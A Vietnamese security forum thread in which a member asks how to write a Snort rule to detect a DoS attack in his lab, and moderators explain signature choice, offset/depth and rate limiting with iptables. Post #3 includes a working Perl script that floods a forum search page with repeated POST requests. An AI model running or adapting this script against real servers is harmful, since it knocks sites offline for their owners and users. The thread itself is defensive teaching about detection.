banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Viết Rule chống "Chiếm tài nguyên máy" trong Snort .  XML
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 31/05/2010 13:49:02 (+0700) | #1 | 211978
[Avatar]
vminh
Member

[Minus]    0    [Plus]
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
[Profile] [PM]
Hi all, em có mô hình thế này

Web sever(192.168.100.2)
IDS (192.168.100.21)
Hacker (192.168.100.66)

Cả 3 máy đều nối chung 1 switch

em dùng máy Hacker tấn công chiếm tài nguyên vào máy Web server, IDS ghi nhận lại sự kiện.
Em dùng wireshark để bắt gói tin này như sau










Rule của mình thế này
Code:
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Tan cong DOS"; content:"|40 00 40 06 |" ;  sid: 1000046; depth: 18; )


Hix em mò hoài....cách viết mà vẫn không bắt được chương trình này tấn công vào server...MOng mọi người giúp em với smilie ...Em cảm ơn và chúc sức khoẻ !!!
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 31/05/2010 14:32:33 (+0700) | #2 | 211984
[Avatar]
phathuynh26
Member

[Minus]    0    [Plus]
Joined: 10/04/2010 08:55:38
Messages: 93
Offline
[Profile] [PM]
+ Bạn cho biết dùng chương trình gì để Dos?
+ Bạn mở file dos.rules tham khảo thêm. Đặt thêm biến flow:to_server,established.
+ Bổ sung biến content (vì dấu hiệu nhận biết Dos đâu chỉ có một)

Hope this help!
Genius is 1% inspiration and 99% perspiration - Thomas Edison
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 31/05/2010 14:36:25 (+0700) | #3 | 211985
[Avatar]
vminh
Member

[Minus]    0    [Plus]
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
[Profile] [PM]

phathuynh26 wrote:
+ Bạn cho biết dùng chương trình gì để Dos?
+ Bạn mở file dos.rules tham khảo thêm. Đặt thêm biến flow:to_server,established.
+ Bổ sung biến content (vì dấu hiệu nhận biết Dos đâu chỉ có một)

Hope this help!
 


Mình đang dùng đoạn code này để DOS
#!/usr/bin/perl
use IO::Socket;

$x = 0;
$host = "192.168.100.2";
$pth = "/";

while($x != 555555)
{

$postit = "do=process&quicksearch=1&childforums=1&exactname=1&s=&securitytoken=1236864212-555b06a6ad17659074d2817bf2fc493c5ac1208b&query=iphone&showposts=0";

$lrg = length $postit;

my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nCo loi xay ra: $!\n" unless $sock;

print $sock "POST $pth"."board/search.php?do=process HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/png,image/*;q=0.8,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us,en\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

syswrite STDOUT, "Dang DoS";


$x++;


Mình cũng đã đặt tham số "flow:to_server,established" như vẫn ko bắt được gói tin
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 01/06/2010 03:51:43 (+0700) | #4 | 212015
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Bồ cho biết lý do tại sao bồ dùng đoạn này trong snort signature: content:"|40 00 40 06 |" ?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 01/06/2010 17:29:39 (+0700) | #5 | 212081
[Avatar]
vminh
Member

[Minus]    0    [Plus]
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
[Profile] [PM]
Em xin chào anh conmale,

Em thấy các gói tin mà wireshark bắt được có đoạn | 40 00 40 06 | đều giống nhau, nên em nghĩ đây có thể là dấu hiệu nhận biết gói tin... nhưng khi em dùng tấn công kiểu khác thì thấy cũng có đoạn này ---> có thể em đã bị lầm...

Anh commale có thể gợi ý cho em phần nào quan trọng để có thể bắt gói tin được ko ?

Em xin cảm ơn Anh.
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 01/06/2010 23:56:44 (+0700) | #6 | 212113
[Avatar]
vminh
Member

[Minus]    0    [Plus]
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
[Profile] [PM]
Anh commale ơi, em đã đọc kí sự dos 4 của anh, nhưng em ko hiểu về 2 từ khoá này

offset:30; depth:80;: tôi muốn thâu hẹp phạm vi tìm kiếm dấu hiệu đặc thù để snort không mất thời gian đi lục tìm trong suốt một payload dài thậm thượt.  


offset theo em nghĩ là nơi bắt đầu
depth là nơi cuối

em không biết hiểu như vậy có đúng không ạ ? smilie
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 02/06/2010 04:04:12 (+0700) | #7 | 212114
Mr.Khoai
Moderator

Joined: 27/06/2006 01:55:07
Messages: 954
Offline
[Profile] [PM]
vminh,

Tất cả các loại tấn công đều thực hiện trên IPv4, bắt nguồn từ cùng một nguồn và đi đến cùng một đích đến thì trong IP headers có rất nhiều điểm tương đồng. IDS/IPS rules nói chung thường tốt nhất không nên để dành quá nhiều thời gian inspect phần IP/TCP headers (trừ những trường hợp rất đặc biệt) mà nên chú trọng coi phần payload.

offset:30; depth:80; <-- Có nghĩa là snort bắt đầu inspect từ byte thứ 30 (offset) và chỉ inspect 80 byytes mà thôi (depth) thay vì phải inspect đến cuối gói tin. Bạn có thể tham khảo thêm link này: http://packetstormsecurity.nl/papers/IDS/snort_rules.htm để biết thêm một số options cho snort rule. Tốt nhất là tìm một quyển sách về snort đọc cho có hệ thống và chắc ăn.

khoai
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 02/06/2010 15:31:25 (+0700) | #8 | 212169
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vminh wrote:
Em xin chào anh conmale,

Em thấy các gói tin mà wireshark bắt được có đoạn | 40 00 40 06 | đều giống nhau, nên em nghĩ đây có thể là dấu hiệu nhận biết gói tin... nhưng khi em dùng tấn công kiểu khác thì thấy cũng có đoạn này ---> có thể em đã bị lầm...

Anh commale có thể gợi ý cho em phần nào quan trọng để có thể bắt gói tin được ko ?

Em xin cảm ơn Anh. 


Nói về mặt kỹ thuật, em nên dùng Wireshark để phân tích gói tin HTTP (thường là gói ACK trên bình diện TCP) để xem payload của nó và tìm ra signature đặc biệt của gói tin này. Cụ thể là gói tin có chữ "POST" hay "GET". Đừng xem gói tin TCP thông thường vì nó chỉ là một mảnh TCP chưa được gom lại để thành một gói HTTP hoàn chỉnh.

Nói về mặt logic, dùng snort để detect và ngăn cản DDoS thường không hữu hiệu bởi vì snort không có khả năng "đếm" xem một IP nào đó có gởi cùng 1 request như vậy nhiều lần trong một khoảng thời gian hay không. Nếu chỉ đơn thuần xét đến signature đặc biệt nào đó để cản DDoS thì em sẽ rất vất vả nếu như kẻ tấn công liên tục thay đổi dạng request. Cách tốt nhất nên dùng module -m recent kèm theo những điều kiện đặc thù nào đó để hình thành luật chống DDoS. Nguyên lý căn bản là: nếu một IP gởi cùng một request hoặc nhiều request có cùng tính chất quá nhiều lần trong một khoảng thời gian nào đó thì cản nó. Tuy nhiên việc cản lọc này cũng cần phải có thời hạn nhất định không thì firewall block IP đó vĩnh viễn thì hoá ra mình sẽ tự tạo "từ chối dịch vụ" cho chính mình (vì rốt cuộc chẳng có mấy người vô site của mình nữa - đặc biệt là IP động và được tái sử dụng như ở VN). Module -m recent là một công cụ lợi hại để giúp xác định số lần requests trong 1 khoảng thời gian cũng như giúp tháo bỏ cản lọc IP ấy sau một khoảng thời gian nào đó.

Em nên tìm đọc "Ký sự những vụ DDoS đến HVA" trên diễn đàn này để rút tỉa thêm. Trong loạt bài này anh đã ít nhiều phân tích những khía cạnh em đang tìm hiểu.

Good luck.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 02/06/2010 16:20:48 (+0700) | #9 | 212170
Xcode
Member

[Minus]    0    [Plus]
Joined: 22/12/2009 08:59:29
Messages: 15
Offline
[Profile] [PM]

conmale wrote:

vminh wrote:
Em xin chào anh conmale,

Em thấy các gói tin mà wireshark bắt được có đoạn | 40 00 40 06 | đều giống nhau, nên em nghĩ đây có thể là dấu hiệu nhận biết gói tin... nhưng khi em dùng tấn công kiểu khác thì thấy cũng có đoạn này ---> có thể em đã bị lầm...

Anh commale có thể gợi ý cho em phần nào quan trọng để có thể bắt gói tin được ko ?

Em xin cảm ơn Anh. 


Nói về mặt kỹ thuật, em nên dùng Wireshark để phân tích gói tin HTTP (thường là gói ACK trên bình diện TCP) để xem payload của nó và tìm ra signature đặc biệt của gói tin này. Cụ thể là gói tin có chữ "POST" hay "GET". Đừng xem gói tin TCP thông thường vì nó chỉ là một mảnh TCP chưa được gom lại để thành một gói HTTP hoàn chỉnh.

Nói về mặt logic, dùng snort để detect và ngăn cản DDoS thường không hữu hiệu bởi vì snort không có khả năng "đếm" xem một IP nào đó có gởi cùng 1 request như vậy nhiều lần trong một khoảng thời gian hay không. Nếu chỉ đơn thuần xét đến signature đặc biệt nào đó để cản DDoS thì em sẽ rất vất vả nếu như kẻ tấn công liên tục thay đổi dạng request. Cách tốt nhất nên dùng module -m recent kèm theo những điều kiện đặc thù nào đó để hình thành luật chống DDoS. Nguyên lý căn bản là: nếu một IP gởi cùng một request hoặc nhiều request có cùng tính chất quá nhiều lần trong một khoảng thời gian nào đó thì cản nó. Tuy nhiên việc cản lọc này cũng cần phải có thời hạn nhất định không thì firewall block IP đó vĩnh viễn thì hoá ra mình sẽ tự tạo "từ chối dịch vụ" cho chính mình (vì rốt cuộc chẳng có mấy người vô site của mình nữa - đặc biệt là IP động và được tái sử dụng như ở VN). Module -m recent là một công cụ lợi hại để giúp xác định số lần requests trong 1 khoảng thời gian cũng như giúp tháo bỏ cản lọc IP ấy sau một khoảng thời gian nào đó.

Em nên tìm đọc "Ký sự những vụ DDoS đến HVA" trên diễn đàn này để rút tỉa thêm. Trong loạt bài này anh đã ít nhiều phân tích những khía cạnh em đang tìm hiểu.

Good luck. 


Mình thích việc chặn theo kiểu số lần trên/ đơn vị thời gian này. Vì nó thể chặn ở tầng thấp (giảm tính toán và bộ nhớ ở các tầng trên) và buộc kẻ tấn công DDoS phải có tần suất truy cập giống bình thường

Mà đã gống như người thường thì làm sao mà đạt được kết quả mong muốn (DoS), trừ khi ...
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 03/06/2010 12:53:03 (+0700) | #10 | 212238
[Avatar]
vminh
Member

[Minus]    0    [Plus]
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
[Profile] [PM]
Thông tin của 2 anh đã giúp em rất nhiều. Em xin cảm ơn 2 anh. smilie
[Up] [Print Copy]
  [Question]   Viết Rule chống "Chiếm tài nguyên máy" trong Snort . 23/12/2010 23:24:35 (+0700) | #11 | 227708
anhabc
Member

[Minus]    0    [Plus]
Joined: 26/02/2008 23:53:12
Messages: 1
Offline
[Profile] [PM]
mình cũng đang sử dụng cái code dos này giống như bạn vminh, vậy ai đã viết được rule này rồi có thể share cho a e tham khảo được không. thanks
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|